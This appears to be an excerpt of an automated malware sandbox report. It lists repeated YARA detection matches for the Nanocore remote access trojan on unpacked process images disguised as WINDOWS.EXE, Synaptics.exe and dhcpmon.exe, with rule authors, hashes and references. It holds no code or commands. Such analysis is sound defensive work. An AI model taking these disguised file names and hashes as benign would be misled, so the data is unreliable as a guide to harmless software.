            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
